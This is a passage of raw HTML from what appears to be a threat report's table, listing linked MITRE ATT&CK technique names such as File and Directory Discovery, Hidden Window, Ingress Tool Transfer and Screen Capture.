vertical-align: baseline;">Data from Local System</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">, </span><a href="https://attack.mitre.org/techniques/T1083"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">File and Directory Discovery</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">, </span><a href="https://attack.mitre.org/techniques/T1564"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Hide Artifacts</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">: </span><a href="https://attack.mitre.org/techniques/T1564/003"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Hidden Window</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">, </span><a href="https://attack.mitre.org/techniques/T1105"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Ingress Tool Transfer</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">, </span><a href="https://attack.mitre.org/techniques/T1135"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Network Share Discovery</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">, </span><a href="https://attack.mitre.org/techniques/T1120"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Peripheral Device Discovery</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">, </span><a href="https://attack.mitre.org/techniques/T1113"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Screen Capture</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">, </span><a href="https://attack.mitre.org/techniques/T1016"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">System Network Configuration Discovery</span></a><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(33, 37, 41); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">: </span><a href="https://attack.mitre.org/techniques/T1016/001"><span style="font-size: 12pt; font-family: Arial, sans-serif; color: rgb(79, 124, 172); background-color: transparent; font-variant-numeric: normal; font-variant-east-asian: normal; font-variant-alternates: normal; vertical-align: baseline;">Internet Connection Discovery</span></a></p></td></tr></tbody></table></div></span></div><p style="line-height: 1.44; margin-top: 0pt; margin-bottom: 0pt; padding: 0pt 0pt 4pt;"><br></p><p style="line-height: 1.38; margin-top: 0pt; margin-bottom: 12pt;"><br></p></span></div><div><br></div><div><br></div>